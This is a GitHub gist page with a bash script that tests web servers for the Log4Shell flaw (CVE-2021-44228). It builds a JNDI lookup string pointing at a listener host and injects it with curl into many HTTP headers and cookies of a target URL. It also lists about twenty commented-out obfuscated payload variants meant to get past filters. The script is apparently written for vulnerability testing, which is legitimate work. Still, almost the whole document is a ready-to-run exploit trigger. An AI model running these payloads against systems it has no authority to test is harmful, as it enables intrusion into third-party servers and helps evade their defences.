Skip to content

Instantly share code, notes, and snippets.

@dustinbutterworth
Last active December 17, 2021 19:38
Show Gist options
  • Save dustinbutterworth/8447e4adf8747909f3e7d11d2a8905e8 to your computer and use it in GitHub Desktop.
Save dustinbutterworth/8447e4adf8747909f3e7d11d2a8905e8 to your computer and use it in GitHub Desktop.
CVE-2021-44228 Simple Curl Test
#!/usr/bin/env bash
# Run with arguments like: ./CVE-2021-44228.sh aabbccddeeffgg.interact.sh https://test.com/test
LISTENER=$1
URL=$2
PAYLOAD='${jndi:ldap://'${LISTENER}'}'
# PAYLOAD='${jndi:${lower:l}${lower:d}a${lower:p}://'${LISTENER}''
# PAYLOAD='${j${k8s:k5:-ND}i${sd:k5:-:}ldap://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://'${LISTENER}'} '
# PAYLOAD='${${::-j}ndi:rmi://'${LISTENER}'} '
# PAYLOAD='${jndi:rmi://'${LISTENER}'}'
# PAYLOAD='${${lower:jndi}:${lower:rmi}://'${LISTENER}'} '
# PAYLOAD='${${lower:${lower:jndi}}:${lower:rmi}://'${LISTENER}'} '
# PAYLOAD='${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://'${LISTENER}'}'
# PAYLOAD='${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
# PAYLOAD='${${upper:jndi}:${upper:rmi}://'${LISTENER}'} '
# PAYLOAD='${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://'${LISTENER}'}'
# PAYLOAD='${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
# PAYLOAD='${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://'${LISTENER}'}'
# PAYLOAD='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${LISTENER}'}'
echo "Listener: ${LISTENER}"
echo "URL: ${URL}"
echo "Payload: ${PAYLOAD}"
curl -k -L "{$URL}" \
-H 'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Accept-Language: '${PAYLOAD}'' \
-H 'Connection: close' \
-H 'Referer: '${PAYLOAD}'' \
-H 'X-Api-Version: '${PAYLOAD}'' \
-H 'Cookie: '${PAYLOAD}'='${PAYLOAD}';JSESSIONID='${PAYLOAD}';SESSIONID='${PAYLOAD}';PHPSESSID='${PAYLOAD}';token='${PAYLOAD}';session='${PAYLOAD}'' \
-H 'User-Agent: '${PAYLOAD}'' \
-H 'Pragma: no-cache' \
-H 'If-Modified-Since: '${PAYLOAD}'' \
-H 'Accept: '${PAYLOAD}'' \
--proxy http://127.0.0.1:8080
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment